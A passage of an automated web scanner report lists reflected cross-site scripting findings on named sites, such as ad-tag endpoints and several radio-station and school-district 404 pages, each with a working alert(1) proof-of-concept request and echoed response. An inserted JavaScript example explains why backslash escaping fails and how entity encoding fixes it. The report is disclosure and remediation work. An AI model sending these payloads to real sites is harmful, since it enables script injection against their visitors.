User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
CW-Server: CW-WEB10
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Mon, 25 Apr 2011 16:56:22 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5781
Date: Tue, 03 May 2011 15:41:30 GMT
Connection: close
Set-Cookie: C2W4=CT; expires=Tue, 31-May-2011 15:41:30 GMT; path=/; domain=.contextweb.com
Set-Cookie: cw=cw; domain=.contextweb.com; path=/
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="503597";var ct="94417";var cf="300X250";var ca="VIEWAD8424e";alert(1)//7487bfd2194";var cr="200";var cw="300";var ch="250";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;va
...[SNIP]...

6.31. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwadformat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb019"%3balert(1)//b65de132d16 was submitted in the cwadformat parameter. This input was echoed as eb019";alert(1)//b65de132d16 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250eb019"%3balert(1)//b65de132d16&cwpid=503597&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=94417 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
CW-Server: CW-WEB24
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Mon, 25 Apr 2011 16:56:22 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5781
Date: Tue, 03 May 2011 15:41:33 GMT
Connection: close
Set-Cookie: C2W4=CT; expires=Tue, 31-May-2011 15:41:33 GMT; path=/; domain=.contextweb.com
Set-Cookie: cw=cw; domain=.contextweb.com; path=/
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="503597";var ct="94417";var cf="300X250eb019";alert(1)//b65de132d16";var ca="VIEWAD";var cr="200";var cw="300";var ch="250";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var
...[SNIP]...

6.32. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwheight request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e6c6"%3balert(1)//02ff7aa62ef was submitted in the cwheight parameter. This input was echoed as 9e6c6";alert(1)//02ff7aa62ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=503597&cwwidth=300&cwheight=2509e6c6"%3balert(1)//02ff7aa62ef&cwpnet=1&cwtagid=94417 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: CW-APP200
Cache-Control: max-age=10000, public, must-revalidate
Last-Modified: Fri, 29 Apr 02011 17:42:46 EDT
Content-Type: application/x-javascript;charset=ISO-8859-1
Content-Length: 5826
Date: Tue, 03 May 2011 15:41:44 GMT
Connection: close
Set-Cookie: C2W4=CT; expires=Tue, 31-May-2011 15:41:44 GMT; path=/; domain=.contextweb.com
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Tue, 03-May-2011 18:28:24 GMT; Path=/
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="503597";var cwtagid="94417";var cwadformat="300X250";var ca="VIEWAD";var cr="200";var cw="300";var ch="2509e6c6";alert(1)//02ff7aa62ef";var cads="0";var cp="503597";var ct="94417";var cf="300X250";var cn="1";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=do
...[SNIP]...

6.33. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwpid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8bcb"%3balert(1)//0d2ab08f98b was submitted in the cwpid parameter. This input was echoed as f8bcb";alert(1)//0d2ab08f98b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=503597f8bcb"%3balert(1)//0d2ab08f98b&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=94417 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: CW-APP118
Cache-Control: max-age=10000, public, must-revalidate
Last-Modified: Sat, 30 Apr 02011 11:53:36 EDT
Content-Type: application/x-javascript;charset=ISO-8859-1
Content-Length: 5854
Date: Tue, 03 May 2011 15:41:40 GMT
Connection: close
Set-Cookie: C2W4=CT; expires=Tue, 31-May-2011 15:41:40 GMT; path=/; domain=.contextweb.com
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Tue, 03-May-2011 18:28:20 GMT; Path=/
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="503597f8bcb";alert(1)//0d2ab08f98b";var cwtagid="94417";var cwadformat="300X250";var ca="VIEWAD";var cr="200";var cw="300";var ch="250";var cads="0";var cp="503597f8bcb";alert(1)//0d2ab08f98b";var ct="94417";var cf="300X250";var cn="1"
...[SNIP]...

6.34. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwpnet request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e73b3"%3balert(1)//a8ed0abca64 was submitted in the cwpnet parameter. This input was echoed as e73b3";alert(1)//a8ed0abca64 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=503597&cwwidth=300&cwheight=250&cwpnet=1e73b3"%3balert(1)//a8ed0abca64&cwtagid=94417 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
CW-Server: CW-WEB10
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Mon, 25 Apr 2011 16:56:22 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5781
Date: Tue, 03 May 2011 15:41:46 GMT
Connection: close
Set-Cookie: C2W4=CT; expires=Tue, 31-May-2011 15:41:46 GMT; path=/; domain=.contextweb.com
Set-Cookie: cw=cw; domain=.contextweb.com; path=/
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="503597";var ct="94417";var cf="300X250";var ca="VIEWAD";var cr="200";var cw="300";var ch="250";var cn="1e73b3";alert(1)//a8ed0abca64";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var _cww=window;var _cwu="undefined";var _cwn=naviga
...[SNIP]...

6.35. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwrun request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb99a"%3balert(1)//7f941fa397 was submitted in the cwrun parameter. This input was echoed as eb99a";alert(1)//7f941fa397 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200eb99a"%3balert(1)//7f941fa397&cwadformat=300X250&cwpid=503597&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=94417 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
CW-Server: CW-WEB30
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Mon, 25 Apr 2011 16:56:22 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5780
Date: Tue, 03 May 2011 15:41:33 GMT
Connection: close
Set-Cookie: C2W4=CT; expires=Tue, 31-May-2011 15:41:31 GMT; path=/; domain=.contextweb.com
Set-Cookie: cw=cw; domain=.contextweb.com; path=/
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="503597";var ct="94417";var cf="300X250";var ca="VIEWAD";var cr="200eb99a";alert(1)//7f941fa397";var cw="300";var ch="250";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var _cww=window
...[SNIP]...

6.36. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwtagid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0ee9"%3balert(1)//43dd5ee413a was submitted in the cwtagid parameter. This input was echoed as c0ee9";alert(1)//43dd5ee413a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=503597&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=94417c0ee9"%3balert(1)//43dd5ee413a HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
CW-Server: CW-WEB22
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Mon, 25 Apr 2011 16:56:22 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5781
Date: Tue, 03 May 2011 15:41:47 GMT
Connection: close
Set-Cookie: C2W4=CT; expires=Tue, 31-May-2011 15:41:47 GMT; path=/; domain=.contextweb.com
Set-Cookie: cw=cw; domain=.contextweb.com; path=/
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="503597";var ct="94417c0ee9";alert(1)//43dd5ee413a";var cf="300X250";var ca="VIEWAD";var cr="200";var cw="300";var ch="250";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var
...[SNIP]...

6.37. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwwidth request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44449"%3balert(1)//57b0f102807 was submitted in the cwwidth parameter. This input was echoed as 44449";alert(1)//57b0f102807 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=503597&cwwidth=30044449"%3balert(1)//57b0f102807&cwheight=250&cwpnet=1&cwtagid=94417 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
CW-Server: CW-WEB29
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Mon, 25 Apr 2011 16:56:22 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5781
Date: Tue, 03 May 2011 15:41:41 GMT
Connection: close
Set-Cookie: C2W4=CT; expires=Tue, 31-May-2011 15:41:41 GMT; path=/; domain=.contextweb.com
Set-Cookie: cw=cw; domain=.contextweb.com; path=/
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="503597";var ct="94417";var cf="300X250";var ca="VIEWAD";var cr="200";var cw="30044449";alert(1)//57b0f102807";var ch="250";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var _cww=window;var _cwu="un
...[SNIP]...

6.38. http://www.610wtvn.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.610wtvn.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 735de"><script>alert(1)</script>53920edd13d was submitted in the REST URL parameter 1. This input was echoed as 735de\"><script>alert(1)</script>53920edd13d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico735de"><script>alert(1)</script>53920edd13d HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.610wtvn.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
X-Varnish: 3790457961
X-Cache-Server: varnish02
Expires: Tue, 03 May 2011 11:40:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 11:40:37 GMT
Content-Length: 32669
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>Page Not Found - News Talk 610 WTVN | Best Buckeye Coverage | Colu
...[SNIP]...
<meta property="og:url" content="http://www.610wtvn.com/favicon.ico735de\"><script>alert(1)</script>53920edd13d" />
...[SNIP]...
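In 6.38, 6.39, 6.41 and 6.42 the 404 page turns the `"` from the request into `\"` before placing the URL in the og:url meta content attribute. That is a JavaScript-string escape, not an HTML one: an HTML parser gives the backslash no meaning, the attribute still ends at the quote, and the `<script>` that follows is live markup, which is why the scanner still reports these with certain confidence. The following is an added example, not code from the report or from any of the sites listed. It reproduces the backslash escaping next to entity encoding and checks both with a deliberately minimal attribute tokenizer; the same encoder also covers the text-between-tags reflection in 6.40. The URL is a constructed placeholder carrying the 6.38 payload.

```javascript
// Added example (not from the XSS.CX report or the sites it lists): the
// HTML-attribute reflection behind findings 6.38-6.43, where the request URL
// is copied into <meta property="og:url" content="..."> and a double quote is
// "escaped" as \" which HTML does not understand.

// Constructed URL: placeholder host, payload taken from finding 6.38.
const PAYLOAD_URL = 'http://www.example.test/favicon.ico735de"><script>alert(1)</script>53920edd13d';

// What the captured 404 pages do: a JavaScript-style backslash before the quote.
function metaTagBackslash(url) {
  return '<meta property="og:url" content="' + url.replace(/"/g, '\\"') + '" />';
}

// Hardened: entity-encode every character that can end or alter an attribute
// value or start markup. & goes first so the later entities are not re-encoded.
function htmlAttrEncode(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

function metaTagEncoded(url) {
  return '<meta property="og:url" content="' + htmlAttrEncode(url) + '" />';
}

// Reverses htmlAttrEncode for the handful of entities it emits.
function decodeEntities(s) {
  return s
    .replace(/&quot;/g, '"')
    .replace(/&#39;/g, "'")
    .replace(/&lt;/g, '<')
    .replace(/&gt;/g, '>')
    .replace(/&amp;/g, '&');
}

// Minimal tokenizer: reads the first content="..." attribute the way an HTML
// parser would (the value ends at the next raw quote, backslash or not),
// decodes it, then blanks every quoted attribute value and counts <script
// tags left over in markup position. Enough to show the difference; a real
// check would run the page through a full HTML parser.
function inspect(markup) {
  const m = /content="([^"]*)"/.exec(markup);
  const attrValue = m ? decodeEntities(m[1]) : null;
  const outsideAttrs = markup.replace(/"[^"]*"/g, '""');
  const scriptTags = (outsideAttrs.match(/<script/gi) || []).length;
  return { attrValue, scriptTags };
}

// Stand-alone demonstration: backslash escaping leaves one <script> in markup
// position and a truncated attribute; entity encoding leaves none and the
// attribute decodes back to the full URL.
for (const [label, markup] of [
  ['backslash', metaTagBackslash(PAYLOAD_URL)],
  ['encoded', metaTagEncoded(PAYLOAD_URL)],
]) {
  console.log(label + ':', markup);
  console.log('  ->', inspect(markup));
}
```

The tokenizer is the check to keep: after any encoding change, parse the output and confirm the attribute value decodes to the original input and no element appears outside an attribute that was not in the template. A grep for `alert` in the response would pass the backslash version on some scanners' heuristics and still leave the page exploitable.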

6.39. http://www.610wtvn.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.610wtvn.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff15d"><script>alert(1)</script>dfbba2ca5f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ff15d\"><script>alert(1)</script>dfbba2ca5f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?ff15d"><script>alert(1)</script>dfbba2ca5f3=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.610wtvn.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
X-Varnish: 3395353806
X-Cache-Server: varnish01
Expires: Tue, 03 May 2011 11:40:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 11:40:31 GMT
Content-Length: 32672
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>Page Not Found - News Talk 610 WTVN | Best Buckeye Coverage | Colu
...[SNIP]...
<meta property="og:url" content="http://www.610wtvn.com/favicon.ico?ff15d\"><script>alert(1)</script>dfbba2ca5f3=1" />
...[SNIP]...

6.40. http://www.alvinisd.net/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.alvinisd.net
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a5590<script>alert(1)</script>65d717db4a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoa5590<script>alert(1)</script>65d717db4a HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.alvinisd.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 10:46:02 GMT
Server: Apache/2.2.14 (Ubuntu)
Set-Cookie: PHPSESSID=c961f65a156b6343d4b963f71aff4a55; path=/
Expires: Wed, 26 Feb 1997 08:21:57 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 2796
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
   dir="ltr">
...[SNIP]...
<div style="font-style: italic; font-size: 90%;">favicon.icoa5590<script>alert(1)</script>65d717db4a</div>
...[SNIP]...

6.41. http://www.am570radio.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.am570radio.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85f60"><script>alert(1)</script>7472f3ccde was submitted in the REST URL parameter 1. This input was echoed as 85f60\"><script>alert(1)</script>7472f3ccde in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico85f60"><script>alert(1)</script>7472f3ccde HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.am570radio.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
X-Varnish: 4192825522
X-Cache-Server: varnish03
Expires: Tue, 03 May 2011 11:24:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 11:24:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 34497

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>Page Not Found - AM 570 KLAC K-Los Angeles California/Orange Count
...[SNIP]...
<meta property="og:url" content="http://www.am570radio.com/favicon.ico85f60\"><script>alert(1)</script>7472f3ccde" />
...[SNIP]...

6.42. http://www.am570radio.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.am570radio.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3439b"><script>alert(1)</script>89da71ed857 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3439b\"><script>alert(1)</script>89da71ed857 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?3439b"><script>alert(1)</script>89da71ed857=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.am570radio.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
X-Varnish: 3790118289
X-Cache-Server: varnish02
Expires: Tue, 03 May 2011 11:24:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 11:24:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 34505

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>Page Not Found - AM 570 KLAC K-Los Angeles California/Orange Count
...[SNIP]...
<meta property="og:url" content="http://www.am570radio.com/favicon.ico?3439b\"><script>alert(1)</script>89da71ed857=1" />
...[SNIP]...

6.43. http://www.aquascapeonline.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aquascapeonline.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f2c5"><script>alert(1)</script>c2b8edb6758 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?4f2c5"><script>alert(1)</script>c2b8edb6758=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aquascapeonline.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:46:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
X-Powered-By: ASP.NET
Content-Length: 20675
Content-Type: text/html
Set-Cookie: language=en; expires=Thu, 02-Jun-2011 10:46:24 GMT; path=/
Set-Cookie: CurrencyCode=USD; expires=Thu, 02-Jun-2011 10:46:24 GMT; path=/
Set-Cookie: Refer=; expires=Wed, 04-May-2011 10:46:24 GMT; path=/
Set-Cookie: s=%3A%3A; expires=Wed, 04-May-2011 10:46:24 GMT; path=/
